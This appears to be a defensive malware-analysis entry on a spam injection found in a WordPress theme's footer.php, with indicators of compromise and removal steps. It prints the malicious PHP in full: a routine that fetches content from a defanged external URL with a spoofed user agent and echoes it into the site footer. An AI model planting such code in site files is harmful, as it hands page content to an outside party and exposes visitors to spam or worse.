High URL Injection 🛡️ Zero-Day Variant

Fetch-Based URL Injection

Case ID: seo-spam-footer-injection • Detected: 2026-01-22

Impact Radius
footer.php of the theme
Removal Difficulty
Moderate
Recurrence Rate
Medium
Key Symptom
Fetches and injects unwanted content from an external source into the website.

Evidence Screenshots

Technical Analysis

The malware is embedded in the theme’s footer.php file. It uses the fetch function, which can utilize file_get_contents and cURL to retrieve content from a remote URL. This content is then injected into the site. The scanners missed it because it employs commonly used PHP functions that don’t appear malicious at first glance.

VirusTotal Analysis: 🛡️ Zero-Day / Fully Undetected.

Attack Chain

  1. The footer.php contains a hardcoded URL.
  2. It attempts to fetch content from this URL using file_get_contents or cURL.
  3. The injected content is then echoed into the site’s footer.

Code Signature(s)

FILE: footer.php

<?php
$url = "hxxps://nawalaku[.]my[.]id/bl/";

function fetch($url) {
    if (ini_get('allow_url_fopen') && ($d = @file_get_contents($url))) return $d;

    if (function_exists('curl_init')) {
        $c = curl_init($url);
        curl_setopt_array($c, [
            CURLOPT_RETURNTRANSFER => 1,
            CURLOPT_FOLLOWLOCATION => 1,
            CURLOPT_USERAGENT => 'Mozilla/5.0',
            CURLOPT_TIMEOUT => 10
        ]);
        $d = curl_exec($c);
        curl_close($c);
        if ($d) return $d;
    }

    $ctx = stream_context_create([
        'http' => ['header' => "User-Agent: Mozilla/5.0\r\n", 'timeout' => 10]
    ]);
    if ($d = @file_get_contents($url, false, $ctx)) return $d;

    return "⚠️ Gagal mengambil konten dari $url";
}

echo fetch($url);


?>

  <?php echo cs_custom_js(); ?>

  </body>
</html>

Indicators of Compromise (IOCs)

  • hxxps://nawalaku[.]my[.]id/bl/
  • fetch function
  • CURLOPT_USERAGENT

Removal Protocol

  1. Remove the malicious fetch function from footer.php.
  2. Replace the footer.php file with a clean version from a backup if available.
  3. Check for and remove any other suspicious code in the theme files or consider reinstalling the theme.

Status: Active Threat.
Verification: Verified by MD Pabel.

Need help removing this?

This malware is rated as Moderate difficulty. If you are unsure, do not attempt manual removal.

Hire MD Pabel for Cleanup